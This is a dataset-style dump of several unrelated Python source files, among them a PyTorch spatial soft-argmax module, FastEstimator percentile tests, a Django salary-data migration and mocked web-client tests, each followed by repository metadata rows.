        output: torch.Tensor = torch.cat([expected_x, expected_y], dim=-1)
        return x_soft, output.view(batch_size, channels, 2)  # BxNx2


class SpatialSoftArgmax2d(nn.Module):
    r"""Creates a module that computes the Spatial Soft-Argmax 2D of a given
    input heatmap.

    Returns the expected 2d coordinates of the given map. The output order is
    x-coord and y-coord.

    Arguments:
        normalized_coordinates (Optional[bool]): whether to return the
          coordinates normalized in the range of [-1, 1]. Otherwise,
          it will return the coordinates in the range of the input shape.
          Default is True.

    Shape:
        - Input: :math:`(B, N, H, W)`
        - Output: :math:`(B, N, 2)`

    Examples::
        >>> input = torch.rand(1, 4, 2, 3)
        >>> m = SpatialSoftArgmax2d()
        >>> coords = m(input)  # 1x4x2
        >>> x_coord, y_coord = torch.chunk(coords, dim=-1, chunks=2)
    """

    def __init__(self, normalized_coordinates: Optional[bool] = True) -> None:
        super().__init__()
        self.normalized_coordinates: Optional[bool] = normalized_coordinates
        self.eps: float = 1e-6  # guards the 1/sum against division by zero

    def forward(self, input: torch.Tensor) -> torch.Tensor:
        """Return the expected (x, y) coordinates per channel, shape (B, N, 2).

        Raises:
            TypeError: if ``input`` is not a torch.Tensor.
            ValueError: if ``input`` is not 4-dimensional.
        """
        if not torch.is_tensor(input):
            raise TypeError("Input type is not a torch.Tensor. Got {}"
                            .format(type(input)))
        if not len(input.shape) == 4:
            raise ValueError("Invalid input shape, we expect BxCxHxW. Got: {}"
                             .format(input.shape))
        # Flatten spatial dims; softmax is computed manually below.
        batch_size, channels, height, width = input.shape
        x: torch.Tensor = input.view(batch_size, channels, -1)

        # Softmax with the max-subtraction trick for numerical stability.
        exp_x = torch.exp(x - torch.max(x, dim=-1, keepdim=True)[0])
        exp_x_sum = 1.0 / (exp_x.sum(dim=-1, keepdim=True) + self.eps)

        # Coordinates grid flattened to match the flattened heatmap.
        pos_y, pos_x = create_meshgrid(input, self.normalized_coordinates)
        pos_x = pos_x.reshape(-1)
        pos_y = pos_y.reshape(-1)

        # Expected coordinates under the (manually normalized) softmax.
        expected_y: torch.Tensor = torch.sum(
            (pos_y * exp_x) * exp_x_sum, dim=-1, keepdim=True)
        expected_x: torch.Tensor = torch.sum(
            (pos_x * exp_x) * exp_x_sum, dim=-1, keepdim=True)
        output: torch.Tensor = torch.cat([expected_x, expected_y], dim=-1)
        return output.view(batch_size, channels, 2)  # BxNx2
40.514124
101
0.615395
942
7,171
4.543524
0.157113
0.074533
0.04486
0.061682
0.831075
0.824065
0.804907
0.773598
0.751168
0.719393
0
0.015059
0.268442
7,171
176
102
40.744318
0.800801
0.309441
0
0.536585
0
0
0.068234
0
0
0
0
0
0
1
0.097561
false
0
0.060976
0
0.256098
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8c8ff2cb3f1da52d6fd59112f976e08f3bc1cb60
180
py
Python
rex_gym/__init__.py
franferri/rex-gym
f171a55732fd578180e14836cfd74deddcb55384
[ "Apache-2.0" ]
1
2020-03-09T07:03:39.000Z
2020-03-09T07:03:39.000Z
rex_gym/__init__.py
franferri/rex-gym
f171a55732fd578180e14836cfd74deddcb55384
[ "Apache-2.0" ]
null
null
null
rex_gym/__init__.py
franferri/rex-gym
f171a55732fd578180e14836cfd74deddcb55384
[ "Apache-2.0" ]
null
null
null
from rex_gym.agents import ppo, tools, scripts from rex_gym.envs import gym, rex_gym_env from rex_gym.model import motor, rex from rex_gym.util import pybullet_data, bullet_client
36
53
0.833333
33
180
4.30303
0.515152
0.211268
0.28169
0
0
0
0
0
0
0
0
0
0.116667
180
4
54
45
0.893082
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8c96207504c3c45de6b356fed5ca0dbb16af90b9
9,198
py
Python
test/PR_test/unit_test/backend/test_percentile.py
DwijayDS/fastestimator
9b288cb2bd870f971ec4cee09d0b3205e1316a94
[ "Apache-2.0" ]
57
2019-05-21T21:29:26.000Z
2022-02-23T05:55:21.000Z
test/PR_test/unit_test/backend/test_percentile.py
vbvg2008/fastestimator
6061a4fbbeb62a2194ef82ba8017f651710d0c65
[ "Apache-2.0" ]
93
2019-05-23T18:36:07.000Z
2022-03-23T17:15:55.000Z
test/PR_test/unit_test/backend/test_percentile.py
vbvg2008/fastestimator
6061a4fbbeb62a2194ef82ba8017f651710d0c65
[ "Apache-2.0" ]
47
2019-05-09T15:41:37.000Z
2022-03-26T17:00:08.000Z
# Copyright 2020 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest

import numpy as np
import tensorflow as tf
import torch

import fastestimator as fe
from fastestimator.test.unittest_util import is_equal


class TestPercentile(unittest.TestCase):
    """Exercises fe.backend.percentile across tf / torch / numpy backends,
    with and without axis selection and keepdims."""

    # ------------------------- tensorflow input ---------------------------------
    def test_percentile_tf_input_axis_none(self):
        with self.subTest("even_elements"):
            tensor = tf.constant([1, 2])
            expected = tf.constant([1])
            actual = fe.backend.percentile(tensor, percentiles=50)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("two_dimensional"):
            tensor = tf.constant([[1, 3, 9], [2, 7, 5], [8, 4, 6]])
            expected = tf.constant([[5]])
            actual = fe.backend.percentile(tensor, percentiles=50)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_percentile"):
            expected = tf.constant([[[1]], [[5]]])
            actual = fe.backend.percentile(tensor, percentiles=[0, 50])
            self.assertTrue(is_equal(actual, expected))

    def test_percentile_tf_input_axis_not_none(self):
        with self.subTest("two_dimensional"):
            tensor = tf.constant([[1, 3, 9], [2, 7, 5], [8, 4, 6]])
            expected = tf.constant([[2, 4, 6]])
            actual = fe.backend.percentile(tensor, percentiles=50, axis=0)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("single_axis"):
            expected = tf.constant([[3], [5], [6]])
            actual = fe.backend.percentile(tensor, percentiles=50, axis=1)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_axis"):
            expected = tf.constant([[5]])
            actual = fe.backend.percentile(tensor, percentiles=50, axis=[0, 1])
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_percentile"):
            expected = tf.constant([[[1]], [[5]]])
            actual = fe.backend.percentile(tensor, percentiles=[0, 50], axis=[0, 1])
            self.assertTrue(is_equal(actual, expected))

    def test_percentile_tf_input_axis_not_none_keepdims_false(self):
        with self.subTest("two_dimensional"):
            tensor = tf.constant([[1, 3, 9], [2, 7, 5], [8, 4, 6]])
            expected = tf.constant([2, 4, 6])
            actual = fe.backend.percentile(tensor, percentiles=50, axis=0, keepdims=False)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("single_axis"):
            expected = tf.constant([3, 5, 6])
            actual = fe.backend.percentile(tensor, percentiles=50, axis=1, keepdims=False)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_axis"):
            expected = tf.constant(5)
            actual = fe.backend.percentile(tensor, percentiles=50, axis=[0, 1], keepdims=False)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_percentile"):
            expected = tf.constant([1, 5])
            actual = fe.backend.percentile(tensor, percentiles=[0, 50], axis=[0, 1], keepdims=False)
            self.assertTrue(is_equal(actual, expected))

    # ------------------------- torch input --------------------------------------
    def test_percentile_torch_input_axis_none(self):
        with self.subTest("even_elements"):
            tensor = torch.tensor([1, 2])
            expected = torch.tensor([1])
            actual = fe.backend.percentile(tensor, percentiles=50)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("two_dimensional"):
            tensor = torch.tensor([[1, 3, 9], [2, 7, 5], [8, 4, 6]])
            expected = torch.tensor([[5]])
            actual = fe.backend.percentile(tensor, percentiles=50)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_percentile"):
            expected = torch.tensor([[[1]], [[5]]])
            actual = fe.backend.percentile(tensor, percentiles=[0, 50])
            self.assertTrue(is_equal(actual, expected))

    def test_percentile_torch_input_axis_not_none(self):
        with self.subTest("two_dimensional"):
            tensor = torch.tensor([[1, 3, 9], [2, 7, 5], [8, 4, 6]])
            expected = torch.tensor([[2, 4, 6]])
            actual = fe.backend.percentile(tensor, percentiles=50, axis=0)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("single_axis"):
            expected = torch.tensor([[3], [5], [6]])
            actual = fe.backend.percentile(tensor, percentiles=50, axis=1)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_axis"):
            expected = torch.tensor([[5]])
            actual = fe.backend.percentile(tensor, percentiles=50, axis=[0, 1])
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_percentile"):
            expected = torch.tensor([[[1]], [[5]]])
            actual = fe.backend.percentile(tensor, percentiles=[0, 50], axis=[0, 1])
            self.assertTrue(is_equal(actual, expected))

    def test_percentile_torch_input_axis_not_none_keepdims_false(self):
        with self.subTest("two_dimensional"):
            tensor = torch.tensor([[1, 3, 9], [2, 7, 5], [8, 4, 6]])
            expected = torch.tensor([2, 4, 6])
            actual = fe.backend.percentile(tensor, percentiles=50, axis=0, keepdims=False)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("single_axis"):
            expected = torch.tensor([3, 5, 6])
            actual = fe.backend.percentile(tensor, percentiles=50, axis=1, keepdims=False)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_axis"):
            expected = torch.tensor(5)
            actual = fe.backend.percentile(tensor, percentiles=50, axis=[0, 1], keepdims=False)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_percentile"):
            expected = torch.tensor([1, 5])
            actual = fe.backend.percentile(tensor, percentiles=[0, 50], axis=[0, 1], keepdims=False)
            self.assertTrue(is_equal(actual, expected))

    # ------------------------- numpy input ---------------------------------------
    def test_percentile_np_input_axis_none(self):
        with self.subTest("even_elements"):
            arr = np.array([1, 2])
            expected = np.array([1])
            actual = fe.backend.percentile(arr, percentiles=50)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("two_dimensional"):
            arr = np.array([[1, 3, 9], [2, 7, 5], [8, 4, 6]])
            expected = np.array([[5]])
            actual = fe.backend.percentile(arr, percentiles=50)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_percentile"):
            expected = np.array([[[1]], [[5]]])
            actual = fe.backend.percentile(arr, percentiles=[0, 50])
            self.assertTrue(is_equal(actual, expected))

    def test_percentile_np_input_axis_not_none(self):
        with self.subTest("two_dimensional"):
            arr = np.array([[1, 3, 9], [2, 7, 5], [8, 4, 6]])
            expected = np.array([[2, 4, 6]])
            actual = fe.backend.percentile(arr, percentiles=50, axis=0)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("single_axis"):
            expected = np.array([[3], [5], [6]])
            actual = fe.backend.percentile(arr, percentiles=50, axis=1)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_axis"):
            expected = np.array([[5]])
            actual = fe.backend.percentile(arr, percentiles=50, axis=[0, 1])
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_percentile"):
            expected = np.array([[[1]], [[5]]])
            actual = fe.backend.percentile(arr, percentiles=[0, 50], axis=[0, 1])
            self.assertTrue(is_equal(actual, expected))

    def test_percentile_np_input_axis_not_none_keepdims_false(self):
        with self.subTest("two_dimensional"):
            arr = np.array([[1, 3, 9], [2, 7, 5], [8, 4, 6]])
            expected = np.array([2, 4, 6])
            actual = fe.backend.percentile(arr, percentiles=50, axis=0, keepdims=False)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("single_axis"):
            expected = np.array([3, 5, 6])
            actual = fe.backend.percentile(arr, percentiles=50, axis=1, keepdims=False)
            self.assertTrue(is_equal(actual, expected))
        with self.subTest("multi_axis"):
            # numpy collapses to a scalar here, so type is deliberately ignored.
            actual = fe.backend.percentile(arr, percentiles=50, axis=[0, 1], keepdims=False)
            self.assertTrue(is_equal(actual, 5, assert_type=False))
        with self.subTest("multi_percentile"):
            expected = np.array([1, 5])
            actual = fe.backend.percentile(arr, percentiles=[0, 50], axis=[0, 1], keepdims=False)
            self.assertTrue(is_equal(actual, expected))
43.386792
93
0.572624
1,184
9,198
4.342061
0.098818
0.046295
0.096285
0.147637
0.864229
0.859366
0.847306
0.83972
0.83972
0.828633
0
0.05897
0.258861
9,198
211
94
43.592417
0.695174
0.088932
0
0.691824
0
0
0.053091
0
0
0
0
0
0.207547
1
0.056604
false
0
0.037736
0
0.100629
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8c9623d3b8dea0025c00a613d033728763b54e78
5,927
py
Python
tx_salaries/migrations/0001_initial.py
texastribune/tx_salaries
197d8da4e1783216830b8d0a5adb23c0200fd3e8
[ "Apache-2.0" ]
6
2016-05-18T05:53:44.000Z
2019-06-13T18:27:50.000Z
tx_salaries/migrations/0001_initial.py
texastribune/tx_salaries
197d8da4e1783216830b8d0a5adb23c0200fd3e8
[ "Apache-2.0" ]
64
2015-02-13T18:29:04.000Z
2018-06-15T19:48:56.000Z
tx_salaries/migrations/0001_initial.py
texastribune/tx_salaries
197d8da4e1783216830b8d0a5adb23c0200fd3e8
[ "Apache-2.0" ]
2
2015-05-08T19:22:12.000Z
2016-07-11T16:57:49.000Z
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-27 17:50
# Initial schema for tx_salaries: compensation types, employees (linked to
# tx_people memberships), employee titles, and per-organization / per-position
# aggregate statistics.  Auto-generated — do not hand-edit applied migrations.
from __future__ import unicode_literals

from django.db import migrations, models
import django.db.models.deletion
import tx_people.fields
import tx_people.utils


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        ('tx_people', '0001_initial'),
    ]

    operations = [
        # Lookup table of compensation kinds (full time / part time).
        migrations.CreateModel(
            name='CompensationType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(choices=[(b'FT', b'Full Time'), (b'PT', b'Part Time')], max_length=250)),
                ('description', models.TextField()),
            ],
        ),
        # Core employee record; `title` FK is added at the end of this migration
        # (AddField below) because EmployeeTitle is created later in the list.
        migrations.CreateModel(
            name='Employee',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # NOTE(review): the generator emitted the same ReducedDateValidator()
                # seven times for start_date/end_date (and three times for
                # hire_date).  Redundant but harmless; kept byte-identical since
                # this migration has been applied.
                ('start_date', tx_people.fields.ReducedDateField(max_length=10, validators=[tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator()])),
                ('end_date', tx_people.fields.ReducedDateField(max_length=10, validators=[tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator()])),
                ('created_at', models.DateTimeField(auto_now=True)),
                ('updated_at', models.DateTimeField(auto_now_add=True)),
                ('hire_date', tx_people.fields.ReducedDateField(max_length=10, validators=[tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator()])),
                ('tenure', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)),
                ('slug', models.SlugField(blank=True, default=None, max_length=255, null=True)),
                ('compensation', models.DecimalField(db_index=True, decimal_places=4, max_digits=12)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('compensation_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tx_salaries.CompensationType')),
                ('position', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tx_people.Membership')),
            ],
            options={
                'abstract': False,
            },
        ),
        # Display title for an employee (FK wired up via AddField below).
        migrations.CreateModel(
            name='EmployeeTitle',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=250)),
            ],
        ),
        # Aggregate salary statistics per tx_people.Organization (1:1).
        migrations.CreateModel(
            name='OrganizationStats',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('distribution', models.TextField(null=True)),
                ('highest_paid', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)),
                ('median_paid', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)),
                ('lowest_paid', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)),
                ('total_number', models.PositiveIntegerField(default=0)),
                ('races', models.TextField()),
                ('female', models.TextField()),
                ('male', models.TextField()),
                ('time_employed', models.TextField()),
                ('date_provided', models.DateField(blank=True, null=True)),
                ('slug', models.SlugField(blank=True, default=None, max_length=255, null=True)),
                ('organization', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='stats', to='tx_people.Organization')),
            ],
            options={
                'abstract': False,
            },
        ),
        # Same aggregate statistics, but per tx_people.Post (1:1).
        migrations.CreateModel(
            name='PositionStats',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('distribution', models.TextField(null=True)),
                ('highest_paid', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)),
                ('median_paid', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)),
                ('lowest_paid', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)),
                ('total_number', models.PositiveIntegerField(default=0)),
                ('races', models.TextField()),
                ('female', models.TextField()),
                ('male', models.TextField()),
                ('time_employed', models.TextField()),
                ('date_provided', models.DateField(blank=True, null=True)),
                ('slug', models.SlugField(blank=True, default=None, max_length=255, null=True)),
                ('position', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='stats', to='tx_people.Post')),
            ],
            options={
                'abstract': False,
            },
        ),
        # Deferred FK from Employee to EmployeeTitle (created above).
        migrations.AddField(
            model_name='employee',
            name='title',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='employees', to='tx_salaries.EmployeeTitle'),
        ),
    ]
57.543689
374
0.619875
598
5,927
5.968227
0.212375
0.05828
0.065565
0.157187
0.777529
0.752312
0.727094
0.718969
0.718969
0.70552
0
0.01482
0.23722
5,927
102
375
58.107843
0.774607
0.011304
0
0.585106
1
0
0.109442
0.012805
0
0
0
0
0
1
0
false
0
0.053191
0
0.095745
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8ca01cfed4288f45f44ef238b661f79c2555aa94
7,565
py
Python
hardware/tests/test_web_client.py
ab7289/mercury-hardware
dc2a4e888184a32aaa1355a1fe9ec77a9cb15ebe
[ "MIT" ]
1
2020-05-09T21:37:12.000Z
2020-05-09T21:37:12.000Z
hardware/tests/test_web_client.py
ab7289/mercury-hardware
dc2a4e888184a32aaa1355a1fe9ec77a9cb15ebe
[ "MIT" ]
8
2020-05-07T01:54:14.000Z
2020-05-13T21:31:56.000Z
hardware/tests/test_web_client.py
ab7289/mercury-hardware
dc2a4e888184a32aaa1355a1fe9ec77a9cb15ebe
[ "MIT" ]
2
2020-05-06T22:24:20.000Z
2020-05-13T20:32:29.000Z
import unittest
from unittest.mock import patch, MagicMock
from testfixtures import TempDirectory, LogCapture
from requests.exceptions import HTTPError
import os
import json

from hardware.CommunicationsPi.web_client import WebClient
from hardware.Utils.logger import Logger


class WebClientTests(unittest.TestCase):
    """Unit tests for WebClient: URL construction from environment variables,
    logger selection, and error propagation when posting payloads."""

    def setUp(self):
        # Fresh temp directory per test so each WebClient gets its own log dir.
        self.temp_dir = TempDirectory()

    def tearDown(self):
        self.temp_dir.cleanup()

    def test_init_no_log_no_server(self):
        # Defaults: WEB_CLIENT_LOG_FILE logger, https URL built from env.
        with patch.dict(
            os.environ,
            {
                "WEB_CLIENT_LOG_FILE": "web_client.log",
                "LOG_DIRECTORY": self.temp_dir.path,
                "LAN_SERVER_HTTPS": "True",
                "LAN_SERVER_IP": "0.0.0.0",
                "LAN_PORT": "0",
            },
        ):
            l_client = WebClient()
            self.assertTrue(l_client.logging is not None)
            self.assertTrue(l_client.logging.name == "WEB_CLIENT_LOG_FILE")
            self.assertIsInstance(l_client.logging, Logger)
            self.assertEqual(l_client.url, "https://0.0.0.0:0")

    def test_init_no_log_no_server_http(self):
        # Without LAN_SERVER_HTTPS the URL falls back to plain http.
        with patch.dict(
            os.environ,
            {
                "WEB_CLIENT_LOG_FILE": "web_client.log",
                "LOG_DIRECTORY": self.temp_dir.path,
                "LAN_SERVER_IP": "0.0.0.0",
                "LAN_PORT": "0",
            },
        ):
            l_client = WebClient()
            self.assertTrue(l_client.logging is not None)
            self.assertTrue(l_client.logging.name == "WEB_CLIENT_LOG_FILE")
            self.assertIsInstance(l_client.logging, Logger)
            self.assertEqual(l_client.url, "http://0.0.0.0:0")

    def test_init_no_log_server(self):
        # An explicit server_url overrides the env-derived URL entirely.
        with patch.dict(
            os.environ,
            {
                "WEB_CLIENT_LOG_FILE": "web_client.log",
                "LOG_DIRECTORY": self.temp_dir.path,
                "LAN_SERVER_HTTPS": "True",
                "LAN_SERVER_IP": "0.0.0.0",
                "LAN_PORT": "0",
            },
        ):
            l_client = WebClient(server_url="/url")
            self.assertTrue(l_client.logging is not None)
            self.assertTrue(l_client.logging.name == "WEB_CLIENT_LOG_FILE")
            self.assertIsInstance(l_client.logging, Logger)
            self.assertEqual(l_client.url, "/url")

    def test_init_log_no_server(self):
        # log_file_name selects which env var names the log file.
        with patch.dict(
            os.environ,
            {
                "NEW_LOG_FILE": "web_client.log",
                "LOG_DIRECTORY": self.temp_dir.path,
                "LAN_SERVER_HTTPS": "True",
                "LAN_SERVER_IP": "0.0.0.0",
                "LAN_PORT": "0",
            },
        ):
            l_client = WebClient(log_file_name="NEW_LOG_FILE")
            self.assertTrue(l_client.logging is not None)
            self.assertTrue(l_client.logging.name == "NEW_LOG_FILE")
            self.assertIsInstance(l_client.logging, Logger)
            self.assertEqual(l_client.url, "https://0.0.0.0:0")

    def test_init_log_server(self):
        # Both overrides together: custom logger name and custom URL.
        with patch.dict(
            os.environ,
            {
                "NEW_LOG_FILE": "web_client.log",
                "LOG_DIRECTORY": self.temp_dir.path,
                "LAN_SERVER_HTTPS": "True",
                "LAN_SERVER_IP": "0.0.0.0",
                "LAN_PORT": "0",
            },
        ):
            l_client = WebClient(log_file_name="NEW_LOG_FILE", server_url="/url")
            self.assertTrue(l_client.logging is not None)
            self.assertTrue(l_client.logging.name == "NEW_LOG_FILE")
            self.assertIsInstance(l_client.logging, Logger)
            self.assertEqual(l_client.url, "/url")

    # NOTE(review): mock_requests=MagicMock() is a mutable default argument;
    # it works here because @patch always supplies the mock positionally, but
    # the conventional signature is `def test_...(self, mock_requests):`.
    @patch("hardware.CommunicationsPi.web_client.requests")
    def test_send_payload(self, mock_requests=MagicMock()):
        # Happy path: send() POSTs JSON to the env-derived URL and logs it.
        with patch.dict(
            os.environ,
            {
                "WEB_CLIENT_LOG_FILE": "web_client.log",
                "LOG_DIRECTORY": self.temp_dir.path,
                "LAN_SERVER_HTTPS": "True",
                "LAN_SERVER_IP": "0.0.0.0",
                "LAN_PORT": "0",
            },
        ):
            with LogCapture() as capture:
                l_client = WebClient()
                payload = '{"key": "value" }'
                payload = json.loads(payload)
                l_client.send(payload)
                mock_requests.post.assert_called_with("https://0.0.0.0:0", json=payload)
                capture.check(
                    ("WEB_CLIENT_LOG_FILE", "INFO", "Pinging: https://0.0.0.0:0"),
                    ("WEB_CLIENT_LOG_FILE", "INFO", f"data: { payload }"),
                )

    @patch("hardware.CommunicationsPi.web_client.requests")
    def test_ping_server_raise_http_ex(self, mock_requests=MagicMock()):
        # HTTPError from requests.post is logged and re-raised, for both the
        # is_json=True (json=) and is_json=False (data=) code paths.
        with patch.dict(
            os.environ,
            {
                "WEB_CLIENT_LOG_FILE": "web_client.log",
                "LOG_DIRECTORY": self.temp_dir.path,
                "LAN_SERVER_HTTPS": "True",
                "LAN_SERVER_IP": "0.0.0.0",
                "LAN_PORT": "0",
            },
        ):
            with LogCapture() as capture:
                l_client = WebClient()
                mock_requests.post.side_effect = HTTPError("HTTPError")
                payload = '{"key": "value" }'
                payloadJson = json.loads(payload)
                with self.assertRaises(HTTPError):
                    l_client.send(payloadJson)
                    mock_requests.post.assert_called_with(
                        "https://0.0.0.0:0", json=payloadJson
                    )
                with self.assertRaises(HTTPError):
                    l_client.send(payload, is_json=False)
                    mock_requests.post.assert_called_with("https://0.0.0.0:0", data=payload)
                capture.check(
                    ("WEB_CLIENT_LOG_FILE", "INFO", "Pinging: https://0.0.0.0:0"),
                    ("WEB_CLIENT_LOG_FILE", "INFO", f"data: { payloadJson }"),
                    ("WEB_CLIENT_LOG_FILE", "ERROR", "HTTP error occurred: HTTPError"),
                    ("WEB_CLIENT_LOG_FILE", "INFO", "Pinging: https://0.0.0.0:0"),
                    ("WEB_CLIENT_LOG_FILE", "INFO", f"data: { payload }"),
                    ("WEB_CLIENT_LOG_FILE", "ERROR", "HTTP error occurred: HTTPError"),
                )

    @patch("hardware.CommunicationsPi.web_client.requests")
    def test_ping_server_raise_ex(self, mock_requests=MagicMock()):
        # Non-HTTP exceptions are logged with a generic message and re-raised.
        with patch.dict(
            os.environ,
            {
                "WEB_CLIENT_LOG_FILE": "web_client.log",
                "LOG_DIRECTORY": self.temp_dir.path,
                "LAN_SERVER_HTTPS": "True",
                "LAN_SERVER_IP": "0.0.0.0",
                "LAN_PORT": "0",
            },
        ):
            with LogCapture() as capture:
                l_client = WebClient()
                mock_requests.post.side_effect = Exception("Exception")
                payload = '{"key": "value" }'
                payload = json.loads(payload)
                with self.assertRaises(Exception):
                    l_client.send(payload)
                    mock_requests.post.assert_called_with("https://0.0.0.0:0", json=payload)
                capture.check(
                    ("WEB_CLIENT_LOG_FILE", "INFO", "Pinging: https://0.0.0.0:0"),
                    ("WEB_CLIENT_LOG_FILE", "INFO", f"data: { payload }"),
                    ("WEB_CLIENT_LOG_FILE", "ERROR", "error occurred: Exception"),
                )


if __name__ == "__main__":
    unittest.main()
35.683962
88
0.531395
843
7,565
4.485172
0.104389
0.035969
0.038879
0.031738
0.855858
0.855858
0.846337
0.799524
0.784713
0.762761
0
0.019126
0.343424
7,565
211
89
35.853081
0.742098
0
0
0.666667
0
0
0.223926
0.017845
0
0
0
0
0.155172
1
0.057471
false
0
0.045977
0
0.109195
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8cc9427d412c06455c1c0bc051a8ebab29b718c8
67
py
Python
nam/utils/__init__.py
BullAJ/nam
fc2da75ba008c4ef02a83747f2116036fa6fec46
[ "MIT" ]
15
2021-03-26T16:00:44.000Z
2022-03-26T07:43:10.000Z
src/baseline/nam/utils/__init__.py
fau-is/gam_comparison
c47e8f8ced281e0a71b7959a211cb5b289ac7606
[ "MIT" ]
6
2021-01-03T22:55:54.000Z
2022-03-11T02:50:38.000Z
src/baseline/nam/utils/__init__.py
fau-is/gam_comparison
c47e8f8ced281e0a71b7959a211cb5b289ac7606
[ "MIT" ]
9
2021-02-08T18:45:52.000Z
2022-03-18T19:42:57.000Z
from .args import * from .graphing import * from .loggers import *
16.75
23
0.731343
9
67
5.444444
0.555556
0.408163
0
0
0
0
0
0
0
0
0
0
0.179104
67
3
24
22.333333
0.890909
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8ceb51a421e2743872ec8672d9eaadd746136453
122
py
Python
examples/convert.py
AlexDLSy/canmatrix
6a03adc29e0734f06950ea9021b488b89deafcb7
[ "BSD-2-Clause" ]
656
2015-02-14T17:56:33.000Z
2022-03-31T17:03:02.000Z
examples/convert.py
AlexDLSy/canmatrix
6a03adc29e0734f06950ea9021b488b89deafcb7
[ "BSD-2-Clause" ]
512
2015-11-05T15:57:12.000Z
2022-03-31T19:27:51.000Z
examples/convert.py
AlexDLSy/canmatrix
6a03adc29e0734f06950ea9021b488b89deafcb7
[ "BSD-2-Clause" ]
348
2015-05-25T03:42:00.000Z
2022-03-24T19:41:30.000Z
#!/usr/bin/env python3
"""Example entry point: thin wrapper around canmatrix's convert CLI."""

import sys

# Allow running the example directly from the source tree, where the
# canmatrix package lives one directory up and may not be installed.
sys.path.append('..')

import canmatrix.cli.convert

if __name__ == "__main__":
    # Guarded so importing this module no longer runs the CLI as a side effect.
    canmatrix.cli.convert.cli_convert()
17.428571
35
0.762295
18
122
5.111111
0.611111
0.326087
0.413043
0
0
0
0
0
0
0
0
0.00885
0.07377
122
6
36
20.333333
0.80531
0.172131
0
0
0
0
0.02
0
0
0
0
0
0
1
0
true
0
